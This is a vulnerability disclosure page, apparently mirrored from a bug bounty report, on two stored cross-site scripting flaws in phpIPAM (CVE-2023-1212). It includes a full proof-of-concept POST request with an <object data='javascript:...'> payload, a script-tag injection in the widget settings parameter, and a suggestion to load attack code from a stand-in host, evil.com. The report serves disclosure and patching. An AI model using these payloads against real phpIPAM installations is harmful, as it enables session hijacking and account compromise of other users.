Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrZpbrent3D5199D6-9BB2-4F7B-BD81-BDED704DA499
HistoryFeb 12, 2023 - 5:03 a.m.

Two Stored XSS in Instructions and User Widget

2023-02-1205:03:33
zpbrent
www.huntr.dev
15
stored xss
santinizer bypass
backend database
post request
user widget
injection
javascript codes
administrators
normal user
proof of concept

EPSS

0.001

Percentile

23.3%

JSON

Stored XSS 1

Description 1

The santinizer founction noxss_html($html) can be bypassed since it missed to ban the tag of <object> in $banned_elements = ['script', 'iframe', 'embed'];. By this missing, the logged admin can maliciously inject xss payloads like <object data="javascript:alert(1)"> in the backend database using the point POST /app/admin/instructions/edit-result.php with parameters instructions=<object data="javascript:alert(1)">, and consequently the other users or admins who view the instructions may execute the injected scripts without their consents. Note that, the <object data="javascript:alert(1)"> can now only be executed in the firefox browser, and for the chrome and IE Edge, the attackers should inject the code using third party links like <object data="http://evil.com/attack.html">

Proof of Concept 1

POST /app/admin/instructions/edit-result.php HTTP/1.1
Host: 192.168.232.128
Content-Length: 136
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.232.128
Referer: http://192.168.232.128/index.php?page=administration&section=instructions
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: table-page-size=50; scantype=scan-icmp; phpipam=6s5iofugf1hvnlgju2pdetg34r
Connection: close

instructions=<object data="javascript:alert(1)">&csrf_cookie=bNf8M4rOVnijA0HS6fgSH7l250t6ZgqP&id=1

When the other users open the instruction page in firefox (our firefox version is 103.0.1 64-bit), the malicious code can be executed as the figure shown below:
alt text

Stored XSS 2

Description 2

The normal user can update their widget settings by the function $User-&gt;self_update_widgets ($_POST['widgets']), in which the $_POST['widgets'] has not been sanitized to remove XSS tags and characters before stored in the backend database in the users table. As a result, the users can inject malicious javascript codes such as &lt;script&gt;alert(1)&lt;/script&gt; using the HTTP POST point POST /app/tools/user-menu/user-widgets-set.php with the parameters `widgets=statistics%3Bfavourite_subnets%3Bchangelog%3Btop10_hosts_v4’><script>alert(1)</script><a><script>alert(1)</script><a>

Related

osv 1
prion 1
cve 1
cvelist 1
nvd 1
openvas 1
osv
osv
CVE-2023-1212
2023-03-07 00:15:09
prion
prion
Cross site scripting
2023-03-07 00:15:00
cve
cve
CVE-2023-1212
2023-03-07 00:15:09
cvelist
cvelist
CVE-2023-1212 Cross-site Scripting (XSS) - Stored in phpipam/phpipam
2023-03-06 00:00:00
nvd
nvd
CVE-2023-1212
2023-03-07 00:15:09
openvas
openvas
phpIPAM < 1.5.2 Multiple Vulnerabilities
2023-03-08 00:00:00

EPSS

0.001

Percentile

23.3%

JSON
Related for 3D5199D6-9BB2-4F7B-BD81-BDED704DA499
osv1prion1cve1cvelist1nvd1openvas1